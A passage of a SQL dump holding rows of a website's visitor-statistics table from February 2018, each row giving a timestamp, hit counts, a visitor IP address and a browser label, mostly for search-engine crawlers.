,0,'178.154.171.60','other'),(208574,1518782978,1,1,0,0,'91.209.11.236','other'),(208575,1518783020,2,2,0,0,'141.8.142.74','other'),(208576,1518783090,1,0,1,0,'66.249.69.143',''),(208577,1518783122,2,2,0,0,'91.196.177.44','chrome'),(208578,1518783391,1,1,0,0,'107.178.195.152','msie'),(208579,1518783397,1,1,0,0,'185.104.120.4','msie'),(208580,1518783530,1,1,0,0,'52.200.221.20','msie'),(208581,1518783537,1,1,0,0,'178.136.15.246','chrome'),(208582,1518783577,1,1,0,0,'52.27.2.86','msie'),(208583,1518783721,1,1,0,0,'54.36.148.119','other'),(208584,1518784021,1,1,0,0,'54.36.149.63','other'),(208585,1518784117,1,1,0,0,'54.36.148.183','other'),(208586,1518784343,1,1,0,0,'54.36.148.210','other'),(208587,1518784542,1,1,0,0,'54.36.148.185','other'),(208588,1518784708,1,1,0,0,'54.36.148.206','other'),(208589,1518784710,1,1,0,0,'54.36.148.175','other'),(208590,1518784881,2,2,0,0,'91.196.178.80','chrome'),(208591,1518784895,1,1,0,0,'54.36.148.130','other'),(208592,1518784981,1,1,0,0,'54.36.148.215','other'),(208593,1518785017,1,1,0,0,'95.132.31.7','chrome'),(208594,1518785328,1,1,0,0,'37.52.97.48','chrome'),(208595,1518785482,1,1,0,0,'54.36.148.116','other'),(208596,1518785554,1,1,0,0,'8.29.198.25','other'),(208597,1518785758,1,1,0,0,'54.36.148.12','other'),(208598,1518785796,1,1,0,0,'141.8.142.74','other'),(208599,1518785937,2,2,0,0,'91.196.178.69','chrome'),(208600,1518786031,1,1,0,0,'54.36.148.78','other'),(208601,1518786073,1,0,1,0,'66.249.69.145',''),(208602,1518786225,1,1,0,0,'164.132.162.164','other'),(208603,1518786305,1,1,0,0,'91.196.178.94','chrome'),(208604,1518786374,1,1,0,0,'176.120.111.53','chrome'),(208605,1518786375,1,1,0,0,'54.36.148.92','other'),(208606,1518786446,1,1,0,0,'164.132.164.180','other'),(208607,1518786616,1,1,0,0,'54.36.148.104','other'),(208608,1518786735,1,1,0,0,'54.36.148.212','other'),(208609,1518786749,1,1,0,0,'54.36.149.94','other'),(208610,1518786837,1,1,0,0,'54.36.148.217','other'),(208611,1518787178,1,1,0,0,'54.36.148.83','other'),(208612,1518787283,1,1,0,0,'54.36.148.163','other'),(208613,1518787431,1,1,0,0,'95.133.144.83','chrome'),(208614,1518787739,1,1,0,0,'54.36.148.79','other'),(208615,1518787899,68,68,0,0,'144.76.138.165','other'),(208616,1518788058,1,1,0,0,'54.36.148.199','other'),(208617,1518788121,1,1,0,0,'91.209.11.236','other'),(208618,1518788217,1,1,0,0,'54.36.148.92','other'),(208619,1518788235,1,1,0,0,'54.36.149.65','other'),(208620,1518788359,1,1,0,0,'54.36.148.159','other'),(208621,1518788475,1,1,0,0,'54.36.148.219','other'),(208622,1518788520,1,1,0,0,'54.36.148.136','other'),(208623,1518788974,1,1,0,0,'54.36.148.127','other'),(208624,1518789300,1,1,0,0,'178.95.24.160','chrome'),(208625,1518789429,1,1,0,0,'54.36.148.65','other'),(208626,1518789443,1,1,0,0,'54.36.149.63','other'),(208627,1518789506,1,1,0,0,'207.46.13.171','other'),(208628,1518790393,2,2,0,0,'54.36.148.146','other'),(208629,1518790398,1,1,0,0,'54.36.148.232','other'),(208630,1518790522,1,1,0,0,'54.36.149.93','other'),(208631,1518790561,1,1,0,0,'54.36.148.151','other'),(208632,1518790749,5,5,0,0,'95.135.91.224','chrome'),(208633,1518790847,1,1,0,0,'91.196.178.104','chrome'),(208634,1518791182,1,1,0,0,'207.46.13.62','other'),(208635,1518791608,1,1,0,0,'54.36.148.126','other'),(208636,1518791965,1,1,0,0,'54.36.148.243','other'),(208637,1518792659,1,1,0,0,'54.36.148.214','other'),(208638,1518792787,1,1,0,0,'54.36.148.23','other'),(208639,1518792959,1,1,0,0,'92.222.24.156','other'),(208640,1518793096,1,1,0,0,'137.74.201.108','other'),(208641,1518793184,1,1,0,0,'54.36.149.39','other'),(208642,1518793203,1,1,0,0,'54.36.148.148','other'),(208643,1518793392,1,1,0,0,'178.154.171.55','other'),(208644,1518793439,1,1,0,0,'37.9.113.114','other'),(208645,1518793516,1,1,0,0,'54.36.148.161','other'),(208646,1518793522,1,1,0,0,'54.36.148.113','other'),(208647,1518793709,1,1,0,0,'54.36.148.181','other'),(208648,1518793847,1,0,1,0,'66.249.69.144',''),(208649,1518794106,1,1,0,0,'54.36.148.88','other'),(208650,1518794127,1,1,0,0,'137.74.207.161','other'),(208651,1518794576,1,1,0,0,'54.36.149.11','other'),(208652,1518794656,1,1,0,0,'54.36.148.61','other'),(208653,1518794682,1,1,0,0,'54.36.149.99','other'),(208654,1518794983,1,1,0,0,'54.36.148.204','other'),(208655,1518795526,1,1,0,0,'178.154.200.28','other'),(208656,1518795689,1,1,0,0,'54.36.149.87','other'),(208657,1518795910,1,1,0,0,'54.36.148.145','other'),(208658,1518795970,1,1,0,0,'54.36.149.4','other'),(208659,1518796160,1,1,0,0,'54.36.148.200','other'),(208660,1518796196,1,1,0,0,'54.36.148.69','other'),(208661,1518796397,1,1,0,0,'8.29.198.25','other'),(208662,1518796843,1,1,0,0,'180.76.15.145','other'),(208663,1518797007,1,1,0,0,'217.69.136.203','other'),(208664,1518797053,1,1,0,0,'91.209.11.236','other'),(208665,1518797126,1,1,0,0,'54.36.148.150','other'),(208666,1518797732,1,1,0,0,'54.36.149.104','other'),(208667,1518797755,1,1,0,0,'54.36.149.46','other'),(208668,1518797983,1,1,0,0,'54.36.148.156','other'),(208669,1518797992,1,1,0,0,'91.209.11.236','other'),(208670,1518798007,1,1,0,0,'207.46.13.62','other'),(208671,1518798113,1,1,0,0,'54.36.148.135','other'),(208672,1518798186,1,1,0,0,'54.36.148.41','other'),(208673,1518798416,2,2,0,0,'5.9.88.103','other'),(208674,1518798665,1,1,0,0,'54.36.148.35','other'),(208675,1518799068,1,1,0,0,'5.45.207.49','other'),(208676,1518799072,1,1,0,0,'141.8.142.96','other'),(208677,1518799230,1,1,0,0,'54.36.148.236','other'),(208678,1518799596,1,1,0,0,'54.36.148.160','other'),(208679,1518799995,1,1,0,0,'54.36.148.35','other'),(208680,1518800074,1,1,0,0,'54.36.148.184','other'),(208681,1518800145,1,1,0,0,'54.36.148.111','other'),(208682,1518800220,1,1,0,0,'54.36.148.230','other'),(208683,1518800412,1,1,0,0,'54.36.148.147','other'),(208684,1518800443,1,1,0,0,'54.36.149.82','other'),(208685,1518800672,2,2,0,0,'91.209.11.236','other'),(208686,1518800770,1,1,0,0,'54.36.149.92','other'),(208687,1518800919,1,1,0,0,'37.9.113.134','other'),(208688,1518801092,1,1,0,0,'207.46.13.147','other'),(208689,1518801131,1,1,0,0,'54.36.148.43','other'),(208690,1518801365,1,1,0,0,'54.36.148.87','other'),(208691,1518801566,1,1,0,0,'54.36.148.238','other'),(208692,1518801626,1,1,0,0,'54.36.148.186','other'),(208693,1518801667,1,1,0,0,'91.209.11.236','other'),(208694,1518801668,1,0,1,0,'66.249.69.143',''),(208695,1518802016,1,1,0,0,'54.36.148.105','other'),(208696,1518802169,1,1,0,0,'54.36.148.92','other'),(208697,1518802286,1,1,0,0,'54.36.148.15','other'),(208698,1518802458,1,1,0,0,'54.36.148.142','other'),(208699,1518802635,2,2,0,0,'91.209.11.236','other'),(208700,1518802721,1,1,0,0,'54.36.148.49','other'),(208701,1518802724,1,1,0,0,'37.9.113.134','other'),(208702,1518802908,1,1,0,0,'54.36.149.78','other'),(208703,1518803058,1,1,0,0,'5.16.72.246','msie'),(208704,1518803060,1,1,0,0,'93.80.37.34','msie'),(208705,1518803061,1,1,0,0,'46.188.31.59','msie'),(208706,1518803303,1,1,0,0,'54.36.148.28','other'),(208707,1518803701,1,1,0,0,'54.36.148.242','other'),(208708,1518804099,1,1,0,0,'51.255.71.98','other'),(208709,1518804301,1,1,0,0,'91.209.11.236','other'),(208710,1518804375,1,1,0,0,'54.36.148.138','other'),(208711,1518804504,1,1,0,0,'178.154.171.88','other'),(208712,1518804777,1,1,0,0,'54.36.148.88','other'),(208713,1518804787,1,1,0,0,'54.36.148.93','other'),(208714,1518804867,1,1,0,0,'54.36.148.243','other'),(208715,1518804894,1,1,0,0,'54.36.148.67','other'),(208716,1518805043,1,1,0,0,'93.91.150.23','firefox'),(208717,1518805084,1,1,0,0,'54.36.148.177','other'),(208718,1518805264,1,1,0,0,'54.36.148.50','other'),(208719,1518805460,1,1,0,0,'54.36.148.149','other'),(208720,1518805529,1,1,0,0,'37.115.69.13','chrome'),(208721,1518805707,1,1,0,0,'66.249.93.204','chrome'),(208722,1518805832,1,1,0,0,'54.36.149.104','other'),(208723,1518805918,1,1,0,0,'54.36.148.240','other'),(208724,1518806073,1,1,0,0,'54.36.148.119','other'),(208725,1518806335,1,1,0,0,'217.69.136.208','other'),(208726,1518806571,1,1,0,0,'54.36.148.51','other'),(208727,1518806773,1,1,0,0,'66.102.9.35','chrome'),(208728,1518806862,1,1,0,0,'207.46.13.62','other'),(208729,1518807120,1,1,0,0,'54.36.148.33','other'),(208730,1518807149,1,1,0,0,'54.36.148.133','other'),(208731,1518807237,1,1,0,0,'8.29.198.25','other'),(208732,1518807270,1,1,0,0,'54.36.148.89','other'),(208733,1518807725,1,1,0,0,'54.36.149.104','other'),(208734,1518807730,1,1,0,0,'54.36.148.219','other'),(208735,1518807791,1,1,0,0,'217.69.136.204','other'),(208736,1518808573,1,1,0,0,'54.36.148.64','other'),(208737,1518808981,1,1,0,0,'46.211.155.161','chrome'),(208738,1518809237,2,2,0,0,'54.36.148.177','other'),(208739,1518809246,1,1,0,0,'54.36.148.59','other'),(208740,1518809288,1,1,0,0,'54.36.148.23','other'),(208741,1518809463,1,1,0,0,'207.46.13.171','other'),(208742,1518809569,1,1,0,0,'137.74.201.100','other'),(208743,1518809663,1,1,0,0,'91.209.11.236','other'),(208744,1518809929,1,1,0,0,'54.36.148.176','other'),(208745,1518810083,1,1,0,0,'54.36.148.117','other'),(208746,1518810246,1,1,0,0,'164.132.162.159','other'),(208747,1518810364,1,1,0,0,'54.36.149.40','other'),(208748,1518810552,1,1,0,0,'54.36.148.203','other'),(208749,1518810661,1,1,0,0,'54.36.148.254','other'),(208750,1518811200,1,1,0,0,'54.36.149.46','other'),(208751,1518811378,1,1,0,0,'54.36.148.79','other'),(208752,1518811475,1,1,0,0,'54.36.148.113','other'),(208753,1518811635,1,1,0,0,'66.249.75.157','chrome'),(208754,1518811768,2,0,2,0,'66.249.69.143',''),(208755,1518811800,1,1,0,0,'193.194.127.222','firefox'),(208756,1518811959,1,1,0,0,'54.36.148.244','other'),(208757,1518812245,1,1,0,0,'54.36.148.124','other'),(208758,1518812326,1,1,0,0,'54.36.148.54','other'),(208759,1518812424,1,1,0,0,'54.36.148.162','other'),(208760,1518812454,1,1,0,0,'91.209.11.236','other'),(208761,1518813299,1,1,0,0,'54.36.148.168','other'),(208762,1518813301,1,1,0,0,'46.211.109.185','other'),(208763,1518813451,2,1,1,0,'66.249.69.143',''),(208764,1518813799,1,1,0,0,'54.36.148.196','other'),(208765,1518814022,1,1,0,0,'141.8.142.74','other'),(208766,1518814074,1,0,1,0,'66.249.75.157',''),(208767,1518814971,1,1,0,0,'54.36.148.160','other'),(208768,1518815042,1,1,0,0,'54.36.148.247','other'),(208769,1518815124,1,0,1,0,'66.249.69.144',''),(208770,1518815133,1,1,0,0,'54.36.149.31','other'),(208771,1518815143,1,1,0,0,'207.46.13.147','other'),(208772,1518815459,1,1,0,0,'217.69.133.225','other'),(208773,1518815593,2,2,0,0,'88.198.55.175','other'),(208774,1518815601,1,1,0,0,'54.36.148.37','other'),(208775,1518815671,1,1,0,0,'54.36.148.84','other'),(208776,1518815954,1,1,0,0,'37.55.226.128','chrome'),(208777,1518816069,1,1,0,0,'141.8.142.96','other'),(208778,1518816124,1,1,0,0,'54.36.149.78','other'),(208779,1518816132,1,1,0,0,'54.36.148.52','other'),(208780,1518816149,1,1,0,0,'54.36.149.3','other'),(208781,1518816246,1,1,0,0,'54.36.148.103','other'),(208782,1518816545,1,1,0,0,'54.36.148.246','other'),(208783,1518816622,1,1,0,0,'54.36.149.2','other'),(208784,1518816673,1,1,0,0,'62.149.29.38','chrome'),(208785,1518816936,1,1,0,0,'54.36.148.196','other'),(208786,1518817463,1,1,0,0,'54.36.148.29','other'),(208787,1518817585,1,1,0,0,'54.36.149.84','other'),(208788,1518818077,1,1,0,0,'8.29.198.25','other'),(208789,1518818091,1,1,0,0,'54.36.148.243','other'),(208790,1518818681,1,1,0,0,'54.36.148.242','other'),(208791,1518818771,1,1,0,0,'54.36.148.167','other'),(208792,1518819199,1,1,0,0,'54.36.148.240','other'),(208793,1518819310,1,1,0,0,'54.36.148.47','other'),(208794,1518819335,1,1,0,0,'54.36.148.32','other'),(208795,1518819669,1,1,0,0,'130.180.211.87','chrome'),(208796,1518819988,1,1,0,0,'54.36.149.5','other'),(208797,1518820033,1,1,0,0,'54.36.148.174','other'),(208798,1518820236,1,1,0,0,'54.36.148.106','other'),(208799,1518820600,1,1,0,0,'54.36.148.55','other'),(208800,1518820614,1,1,0,0,'54.36.148.244','other'),(208801,1518820748,1,1,0,0,'54.36.149.75','other'),(208802,1518821115,1,1,0,0,'54.36.149.85','other'),(208803,1518821157,1,1,0,0,'54.36.148.186','other'),(208804,1518821228,1,1,0,0,'54.36.148.160','other'),(208805,1518821229,1,1,0,0,'141.8.142.74','other'),(208806,1518821253,1,1,0,0,'54.36.148.243','other'),(208807,1518821274,1,1,0,0,'54.36.148.63','other'),(208808,1518821297,1,1,0,0,'54.36.148.146','other'),(208809,1518821368,1,1,0,0,'54.36.148.213','other'),(208810,1518821422,1,1,0,0,'54.36.148.159','other'),(208811,1518821488,1,1,0,0,'54.36.148.12','other'),(208812,1518821580,1,1,0,0,'54.36.149.23','other'),(208813,1518821727,1,1,0,0,'54.36.148.33','other'),(208814,1518821791,1,1,0,0,'54.36.148.120','other'),(208815,1518821814,1,1,0,0,'54.36.149.73','other'),(208816,1518821835,1,1,0,0,'54.36.149.10','other'),(208817,1518821885,1,0,1,0,'66.249.69.145',''),(208818,1518821957,1,1,0,0,'54.36.148.45','other'),(208819,1518822114,1,1,0,0,'54.36.148.48','other'),(208820,1518822353,1,1,0,0,'54.36.148.47','other'),(208821,1518822436,1,1,0,0,'54.36.149.103','other'),(208822,1518822785,1,1,0,0,'54.36.149.73','other'),(208823,1518823097,1,1,0,0,'54.36.148.252','other'),(208824,1518823204,1,1,0,0,'54.36.148.137','other'),(208825,1518823390,1,1,0,0,'54.36.149.28','other'),(208826,1518823702,1,1,0,0,'54.36.149.90','other'),(208827,1518823861,1,1,0,0,'54.36.149.67','other'),(208828,1518823967,1,1,0,0,'54.36.149.17','other'),(208829,1518824016,1,1,0,0,'54.36.148.204','other'),(208830,1518824180,1,1,0,0,'54.36.148.10','other'),(208831,1518824477,1,1,0,0,'54.36.148.51','other'),(208832,1518824830,1,1,0,0,'54.36.148.92','other'),(208833,1518824869,1,1,0,0,'54.36.148.85','other'),(208834,1518825327,1,1,0,0,'54.36.148.154','other'),(208835,1518825383,1,1,0,0,'54.36.149.91','other'),(208836,1518825410,1,1,0,0,'54.36.148.253','other'),(208837,1518825503,1,1,0,0,'54.36.148.41','other'),(208838,1518825826,1,1,0,0,'54.36.149.9','other'),(208839,1518825876,1,1,0,0,'207.46.13.147','other'),(208840,1518825986,1,1,0,0,'217.69.133.193','other'),(208841,1518826173,1,1,0,0,'54.36.149.23','other'),(208842,1518826299,1,1,0,0,'54.36.148.102','other'),(208843,1518826387,1,1,0,0,'54.36.148.46','other'),(208844,1518826619,1,1,0,0,'54.36.148.11','other'),(208845,1518826660,1,1,0,0,'37.9.113.134','other'),(208846,1518826882,1,1,0,0,'91.209.11.236','other'),(208847,1518826943,1,1,0,0,'54.36.149.60','other'),(208848,1518827089,1,1,0,0,'54.36.148.212','other'),(208849,1518827091,1,1,0,0,'54.36.148.56','other'),(208850,1518827127,1,1,0,0,'54.36.149.69','other'),(208851,1518827425,1,1,0,0,'54.36.148.244','other'),(208852,1518827457,1,1,0,0,'54.36.148.228','other'),(208853,1518827560,1,1,0,0,'54.36.148.213','other'),(208854,1518827751,1,1,0,0,'54.36.149.64','other'),(208855,1518827832,1,1,0,0,'54.36.148.118','other'),(208856,1518828123,1,1,0,0,'54.36.149.15','other'),(208857,1518828215,2,2,0,0,'207.46.13.58','other'),(208858,1518828274,1,1,0,0,'54.36.148.233','other'),(208859,1518828748,1,1,0,0,'54.36.148.179','other'),(208860,1518828835,1,0,1,0,'66.249.69.143',''),(208861,1518828916,1,1,0,0,'8.29.198.27','other'),(208862,1518828962,1,1,0,0,'54.36.148.89','other'),(208863,1518829083,1,1,0,0,'188.165.4.128','chrome'),(208864,1518829132,1,1,0,0,'54.36.148.61','other'),(208865,1518829148,1,1,0,0,'54.36.148.199','other'),(208866,1518829514,1,1,0,0,'54.36.148.241','other'),(208867,1518829672,1,1,0,0,'54.36.148.71','other'),(208868,1518830124,1,1,0,0,'217.69.133.248','other'),(208869,1518830293,1,1,0,0,'54.36.149.93','other'),(208870,1518830531,1,1,0,0,'54.36.148.100','other'),(208871,1518830561,1,1,0,0,'109.86.71.21','chrome'),(208872,1518830682,1,1,0,0,'217.69.133.70','other'),(208873,1518830706,1,1,0,0,'54.36.148.112','other'),(208874,1518830865,1,1,0,0,'54.36.148.142','other'),(208875,1518831199,1,1,0,0,'54.36.148.220','other'),(208876,1518831238,1,1,0,0,'54.36.149.26','other'),(208877,1518831878,1,1,0,0,'54.36.148.87','other'),(208878,1518831906,1,1,0,0,'54.36.148.79','other'),(208879,1518832116,1,1,0,0,'54.36.148.112','other'),(208880,1518832165,1,1,0,0,'5.45.207.49','other'),(208881,1518832206,1,1,0,0,'54.36.148.169','other'),(208882,1518832498,1,1,0,0,'54.36.148.180','other'),(208883,1518832615,1,1,0,0,'54.36.148.128','other'),(208884,1518832858,1,1,0,0,'54.36.148.68','other'),(208885,1518832920,1,1,0,0,'54.36.149.93','other'),(208886,1518832934,1,1,0,0,'54.36.148.251','other'),(208887,1518832945,1,1,0,0,'54.36.148.214','other'),(208888,1518832949,1,1,0,0,'54.36.148.96','other'),(208889,1518833005,1,1,0,0,'54.36.148.111','other'),(208890,1518833054,1,1,0,0,'54.36.149.99','other'),(208891,1518833253,1,1,0,0,'54.36.148.54','other'),(208892,1518833306,1,1,0,0,'188.165.4.128','firefox'),(208893,1518833760,1,1,0,0,'54.36.148.68','other'),(208894,1518833781,1,1,0,0,'54.36.148.231','other'),(208895,1518833912,1,0,1,0,'66.249.75.153',''),(208896,1518834064,1,1,0,0,'54.36.148.190','other'),(208897,1518834105,1,1,0,0,'54.36.149.105','other'),(208898,1518834173,1,1,0,0,'54.36.149.90','other'),(208899,1518834222,1,1,0,0,'54.36.148.59','other'),(208900,1518834367,1,1,0,0,'54.36.148.233','other'),(208901,1518834529,1,1,0,0,'54.36.149.50','other'),(208902,1518834738,1,1,0,0,'54.36.148.142','other'),(208903,1518834907,1,1,0,0,'54.36.148.122','other'),(208904,1518834971,1,1,0,0,'37.9.113.114','other'),(208905,1518835016,1,1,0,0,'54.36.148.182','other'),(208906,1518835086,1,1,0,0,'54.36.148.251','other'),(208907,1518835217,1,0,1,0,'66.249.75.153',''),(208908,1518835335,1,1,0,0,'54.36.148.249','other'),(208909,1518835343,1,1,0,0,'54.36.148.67','other'),(208910,1518835528,1,1,0,0,'54.36.148.15','other'),(208911,1518835547,1,1,0,0,'54.36.148.193','other'),(208912,1518835611,1,1,0,0,'54.36.148.173','other'),(208913,1518835626,1,1,0,0,'54.36.148.239','other'),(208914,1518835747,1,1,0,0,'54.36.148.199','other'),(208915,1518836103,1,1,0,0,'54.36.149.13','other'),(208916,1518836179,1,1,0,0,'37.9.113.60','other'),(208917,1518836484,1,1,0,0,'54.36.148.214','other'),(208918,1518836965,1,1,0,0,'54.36.149.31','other'),(208919,1518838460,1,1,0,0,'54.36.148.176','other'),(208920,1518838697,1,1,0,0,'54.36.148.110','other'),(208921,1518838900,1,1,0,0,'54.36.149.53','other'),(208922,1518838922,1,1,0,0,'54.36.148.16','other'),(208923,1518839296,1,1,0,0,'54.36.149.7','other'),(208924,1518839354,1,1,0,0,'54.36.148.127','other'),(208925,1518839451,1,1,0,0,'54.36.148.150','other'),(208926,1518839751,1,1,0,0,'8.29.198.26','other'),(208927,1518839839,1,1,0,0,'54.36.148.197','other'),(208928,1518839874,1,1,0,0,'54.36.149.62','other'),(208929,1518839876,1,1,0,0,'54.36.149.77','other'),(208930,1518840365,1,1,0,0,'54.36.148.40','other'),(208931,1518840645,1,1,0,0,'54.36.148.27','other'),(208932,1518840732,1,1,0,0,'207.46.13.58','other'),(208933,1518840814,1,1,0,0,'54.36.148.150','other'),(208934,1518840840,1,1,0,0,'54.36.148.209','other'),(208935,1518841134,1,1,0,0,'54.36.148.21','other'),(208936,1518841241,1,1,0,0,'54.36.148.33','other'),(208937,1518841382,1,1,0,0,'54.36.149.81','other'),(208938,1518841585,1,1,0,0,'54.36.149.18','other'),(208939,1518841916,1,1,0,0,'54.36.149.14','other'),(208940,1518842066,2,2,0,0,'54.36.149.57','other'),(208941,1518842069,1,1,0,0,'54.36.149.89','other'),(208942,1518842425,1,1,0,0,'54.36.148.175','other'),(208943,1518842480,1,1,0,0,'54.36.148.106','other'),(208944,1518842766,1,1,0,0,'207.46.13.171','other'),(208945,1518843006,1,1,0,0,'54.36.148.62','other'),(208946,1518843010,1,1,0,0,'54.36.148.156','other'),(208947,1518843340,1,1,0,0,'54.36.148.232','other'),(208948,1518843377,27,27,0,0,'69.30.213.202','other'),(208950,1518843558,1,1,0,0,'54.36.149.72','other'),(208951,1518843623,1,1,0,0,'54.36.149.62','other'),(208952,1518843925,1,1,0,0,'54.36.148.108','other'),(208953,1518843967,1,1,0,0,'54.36.148.37','other'),(208954,1518844014,1,1,0,0,'54.36.148.240','other'),(208955,1518844081,1,1,0,0,'54.36.148.58','other'),(208956,1518844201,1,1,0,0,'54.36.148.85','other'),(208957,1518844499,1,1,0,0,'54.36.148.102','other'),(208958,1518844614,1,1,0,0,'54.36.149.21','other'),(208959,1518844637,1,1,0,0,'54.36.148.42','other'),(208960,1518844778,1,1,0,0,'54.36.148.190','other'),(208961,1518845127,1,1,0,0,'54.36.148.159','other'),(208962,1518845305,1,1,0,0,'54.36.149.56','other'),(208963,1518845463,1,1,0,0,'217.69.133.230','other'),(208964,1518845483,1,1,0,0,'54.36.148.239','other'),(208965,1518845554,1,1,0,0,'54.36.149.24','other'),(208966,1518845587,2,2,0,0,'54.165.59.7','other'),(208967,1518845669,2,2,0,0,'54.36.149.90','other'),(208968,1518845731,1,1,0,0,'54.36.148.66','other'),(208969,1518845750,1,1,0,0,'54.37.85.62','other'),(208970,1518845927,1,1,0,0,'217.69.133.15','other'),(208971,1518845931,1,1,0,0,'54.36.149.29','other'),(208972,1518845983,1,1,0,0,'54.36.148.198','other'),(208973,1518846194,1,1,0,0,'54.36.148.139','other'),(208974,1518846211,1,1,0,0,'54.36.149.3','other'),(208975,1518846403,1,0,1,0,'66.249.69.143',''),(208976,1518846422,1,0,1,0,'66.249.69.145',''),(208977,1518847226,1,1,0,0,'54.36.149.85','other'),(208978,1518847552,1,1,0,0,'54.36.148.11','other'),(208979,1518847632,1,1,0,0,'54.36.148.113','other'),(208980,1518847753,1,1,0,0,'54.36.148.163','other'),(208981,1518847937,1,1,0,0,'54.36.148.83','other'),(208982,1518848083,1,1,0,0,'54.36.148.181','other'),(208983,1518848084,1,1,0,0,'54.36.149.94','other'),(208984,1518848408,1,1,0,0,'54.36.148.123','other'),(208985,1518848444,1,1,0,0,'54.36.148.115','other'),(208986,1518848502,1,1,0,0,'54.36.148.238','other'),(208987,1518848791,1,1,0,0,'178.154.171.55','other'),(208988,1518850171,1,1,0,0,'213.180.203.7','other'),(208989,1518850594,1,1,0,0,'8.29.198.25','other'),(208990,1518850818,1,1,0,0,'54.36.149.63','other'),(208991,1518850961,1,1,0,0,'54.36.148.180','other'),(208992,1518851043,1,1,0,0,'54.36.148.123','other'),(208993,1518851159,1,1,0,0,'54.36.149.34','other'),(208994,1518851248,1,1,0,0,'54.36.148.114','other'),(208995,1518851371,1,1,0,0,'54.36.148.37','other'),(208996,1518851530,1,1,0,0,'54.36.148.136','other'),(208997,1518851627,1,1,0,0,'54.36.148.226','other'),(208998,1518851636,1,1,0,0,'54.36.149.104','other'),(208999,1518851679,1,1,0,0,'54.36.148.139','other'),(209000,1518851739,2,0,2,0,'66.249.69.143',''),(209001,1518851803,1,1,0,0,'54.36.148.69','other'),(209002,1518852011,1,1,0,0,'54.36.148.249','other'),(209003,1518852258,1,1,0,0,'141.8.142.74','other'),(209004,1518853103,1,1,0,0,'54.36.149.14','other'),(209005,1518853105,1,1,0,0,'54.36.148.199','other'),(209006,1518853162,1,1,0,0,'54.36.148.193','other'),(209007,1518853372,3,3,0,0,'92.113.188.43','chrome'),(209008,1518854283,1,1,0,0,'54.36.148.220','other'),(209009,1518854443,1,1,0,0,'54.36.149.67','other'),(209010,1518854460,1,1,0,0,'54.36.148.32','other'),(209011,1518854602,1,1,0,0,'54.36.149.22','other'),(209012,1518854685,1,1,0,0,'54.36.149.57','other'),(209013,1518854750,1,1,0,0,'54.36.148.196','other'),(209014,1518854895,1,1,0,0,'217.69.133.252','other'),(209015,1518854953,1,1,0,0,'54.36.149.70','other'),(209016,1518855570,1,1,0,0,'54.36.148.98','other'),(209017,1518855794,1,1,0,0,'217.69.133.235','other'),(209018,1518855985,2,0,2,0,'66.249.69.143',''),(209019,1518856057,1,1,0,0,'54.36.148.124','other'),(209020,1518856149,1,1,0,0,'54.36.149.93','other'),(209021,1518856241,1,1,0,0,'54.36.149.59','other'),(209022,1518856290,1,1,0,0,'180.76.15.159','other'),(209023,1518856423,1,1,0,0,'54.36.148.122','other'),(209024,1518856499,1,1,0,0,'46.161.9.39','firefox'),(209025,1518856547,1,1,0,0,'54.36.148.105','other'),(209026,1518856792,1,1,0,0,'54.36.148.93','other'),(209027,1518856841,1,1,0,0,'54.36.149.19','other'),(209028,1518856872,1,1,0,0,'141.8.142.96','other'),(209029,1518857017,1,1,0,0,'54.36.148.15','other'),(209030,1518857058,1,1,0,0,'54.36.148.141','other'),(209031,1518857497,1,1,0,0,'87.250.224.85','other'),(209032,1518857693,1,1,0,0,'54.36.149.86','other'),(209033,1518858095,2,2,0,0,'54.36.148.125','other'),(209034,1518858173,1,1,0,0,'66.249.93.204','chrome'),(209035,1518858279,1,1,0,0,'54.36.148.165','other'),(209036,1518858361,1,1,0,0,'54.36.148.33','other'),(209037,1518858602,1,1,0,0,'54.36.148.255','other'),(209038,1518858768,1,1,0,0,'54.36.149.36','other'),(209039,1518859381,1,1,0,0,'87.250.224.96','other'),(209040,1518859755,1,1,0,0,'54.36.148.239','other'),(209041,1518859837,1,1,0,0,'54.36.148.119','other'),(209042,1518860031,1,1,0,0,'54.36.149.3','other'),(209043,1518860332,1,1,0,0,'54.36.149.101','other'),(209044,1518860411,1,1,0,0,'54.36.149.58','other'),(209045,1518860595,1,1,0,0,'54.36.148.11','other'),(209046,1518860741,1,1,0,0,'54.36.148.31','other'),(209047,1518860857,1,1,0,0,'54.36.149.72','other'),(209048,1518861004,1,1,0,0,'54.36.148.40','other'),(209049,1518861178,1,1,0,0,'54.36.149.70','other'),(209050,1518861435,1,1,0,0,'8.29.198.26','other'),(209051,1518861518,1,1,0,0,'54.36.149.92','other'),(209052,1518861721,1,1,0,0,'54.36.148.219','other'),(209053,1518861812,1,1,0,0,'54.36.148.129','other'),(209054,1518861880,1,1,0,0,'54.36.148.82','other'),(209055,1518862216,1,1,0,0,'54.36.148.119','other'),(209056,1518862244,1,1,0,0,'54.36.148.53','other'),(209057,1518862845,1,1,0,0,'93.74.110.124','firefox'),(209058,1518863032,1,1,0,0,'54.36.148.109','other'),(209059,1518863236,1,1,0,0,'178.154.200.8','other'),(209060,1518863527,1,1,0,0,'54.36.148.239','other'),(209061,1518863594,1,1,0,0,'54.36.149.81','other'),(209062,1518863738,1,1,0,0,'54.36.148.86','other'),(209063,1518863975,1,1,0,0,'54.36.149.0','other'),(209064,1518863982,1,1,0,0,'54.36.149.23','other'),(209065,1518864138,1,1,0,0,'54.36.148.207','other'),(209066,1518864151,1,1,0,0,'54.36.148.103','other'),(209067,1518864296,1,1,0,0,'54.36.149.101','other'),(209068,1518864361,1,1,0,0,'54.36.149.51','other'),(209069,1518864398,1,1,0,0,'54.36.148.190','other'),(209070,1518864403,2,2,0,0,'92.113.188.43','chrome'),(209071,1518864430,1,1,0,0,'54.36.148.40','other'),(209072,1518864431,1,1,0,0,'86.49.188.134','chrome'),(209073,1518864657,1,1,0,0,'54.36.148.221','other'),(209074,1518865198,1,1,0,0,'54.36.148.45','other'),(209075,1518865651,1,1,0,0,'54.36.148.164','other'),(209076,1518865655,1,1,0,0,'91.209.11.236','other'),(209077,1518866010,1,1,0,0,'54.36.149.22','other'),(209078,1518866026,1,1,0,0,'54.36.148.129','other'),(209079,1518866201,1,1,0,0,'54.36.148.57','other'),(209080,1518866377,1,1,0,0,'54.36.148.152','other'),(209081,1518866660,1,1,0,0,'54.36.149.59','other'),(209082,1518866982,1,1,0,0,'54.36.148.196','other'),(209083,1518867062,1,1,0,0,'54.36.148.129','other'),(209084,1518867256,1,1,0,0,'54.36.148.64','other'),(209085,1518867339,1,0,1,0,'66.249.69.143',''),(209086,1518867525,1,1,0,0,'54.36.149.24','other'),(209087,1518867645,1,1,0,0,'54.36.148.164','other'),(209088,1518867660,1,1,0,0,'54.36.148.228','other'),(209089,1518867738,1,1,0,0,'54.36.148.41','o